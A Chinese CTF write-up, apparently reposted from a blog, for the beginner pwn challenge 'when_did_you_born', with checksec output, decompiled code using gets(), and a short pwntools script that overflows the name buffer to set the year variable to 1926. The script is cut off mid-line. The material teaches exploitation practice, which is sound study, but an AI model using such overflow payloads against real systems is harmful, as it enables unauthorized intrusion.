zoukankan      html  css  js  c++  java
  • 『攻防世界』:新手区 | when_did_you_born

    #之前这题的解题已经写完不小心被我删了。这里重新写上 = =!

    checksec:

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)

    IDA:

    __int64 __fastcall main(__int64 a1, char **a2, char **a3)
    {
      __int64 result; // rax
      char v4; // [rsp+0h] [rbp-20h]
      unsigned int v5; // [rsp+8h] [rbp-18h]
      unsigned __int64 v6; // [rsp+18h] [rbp-8h]
    
      v6 = __readfsqword(0x28u);
      setbuf(stdin, 0LL);
      setbuf(stdout, 0LL);
      setbuf(stderr, 0LL);
      puts("What's Your Birth?");
      __isoc99_scanf("%d", &v5);
      while ( getchar() != 10 )
        ;
      if ( v5 == 1926 )
      {
        puts("You Cannot Born In 1926!");
        result = 0LL;
      }
      else
      {
        puts("What's Your Name?");
        gets(&v4);
        printf("You Are Born In %d
    ", v5);
        if ( v5 == 1926 )
        {
          puts("You Shall Have Flag.");
          system("cat flag");
        }
        else
        {
          puts("You Are Naive.");
          puts("You Speed One Second Here.");
        }
        result = 0LL;
      }
      return result;
    }

    这题思路很简单,首先输入的出生年份不能能为1926,但是进入else函数后需要出生年份为1926就可以得到flag,这里在输入名字的时候溢出覆盖年份的值为1926就可以了

    exp:

    from pwn import *
    
    io = remote("ipaddr",port)
    io.sendlineafter('Birth?','beef')
    payload = b'a'*8 + p64(0x789)
    io.sendlineafter('Name?',payload
  • 相关阅读:
    Symbol
    前端微信支付步骤
    获取url参数值(可解码中文值)
    HTML5--canvas与svg的使用
    js-图片img转base64格式
    echarts 地图
    echarts 水球图
    react长列表性能优化
    CSS Modules
    react路由
  • 原文地址:https://www.cnblogs.com/Zowie/p/13415697.html
Copyright © 2011-2022 走看看